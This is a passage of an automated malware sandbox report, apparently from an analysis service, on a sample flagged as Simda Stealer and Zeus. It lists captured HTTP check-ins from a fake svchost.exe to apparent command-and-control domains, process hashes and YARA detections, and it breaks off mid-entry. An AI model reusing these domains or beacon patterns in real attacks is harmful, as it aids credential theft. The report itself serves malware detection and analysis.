                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32
                                                                                                                                                                                                            Data Ascii: woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .select2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 54978 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:08:02 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:08:04 UTC | 954 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:04 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4GtruFWenSS9sqlJsjeNb2b%2FsUOT83N23rGBakcRCcgx7hQEDZ1N%2BhmKrUk5KQ9kDlUegl9pgq7iqlXgQC1DZe16XdvpuUI3%2BG4GIMZiOzs13%2B%2Fn6RogoG%2FGRucbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1cdec5643b9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1410&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=251&unsent_bytes=0&cid=4be37058d93a0ea8&ts=1860&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 55002 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:08:05 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:08:07 UTC | 1088 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:06 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="42.0",amp_style_sanitizer;dur="15.7",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="20.5"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BauW%2FQbbM5BiqlPzrbbrAhzIqPbQ0ir5HYyIaRL8bdr0m0Iiyp8duU%2FxzzJw%2F6rZb0WhK8LCgyOKuG4gOJsV6Td3cbQnoNrqejCKFc6ONIlt1zT6wdXBGgWnotwgkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1dfa8aa43a3-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1146&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2481576&cwnd=250&unsent_bytes=0&cid=6af90ce2745ec6db&ts=1359&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 55020 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:08:07 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:08:09 UTC | 1090 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:09 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="45.3",amp_style_sanitizer;dur="25.7",amp_tag_and_attribute_sanitizer;dur="15.3",amp_optimizer;dur="20.1"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFlJdVDTs0wstH0wElrNFf996Nvc65TLCorfbc9WK%2FBRp0Bmvc%2BEmxIpw5h7XUOSIAxdmg%2FYPSJvsWHAHR7oRRttdqss%2B5EeLosMInX2PjW3lkcLWKesYpQ4JtAuHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1ed8a4c4245-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1950168&cwnd=251&unsent_bytes=0&cid=2e518d260b9bfe55&ts=1422&x=0"



                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:12:07:33
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\uavINoSIQh.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\uavINoSIQh.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:98422C3DECE103DE16C166C7FBEA2F6C
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:12:07:34
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5 hash:ACF1B66F47538D1828695BAE8D83EF23
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:12:08:10
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:12:08:10
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:12:08:10
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:12:08:11
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:12:08:11
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:12:08:12
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:12:08:13
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 752
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:12:08:14
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:12:08:16
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:12:08:16
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 820
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:12:08:16
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:12:08:19
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:12:08:20
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:12:08:21
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
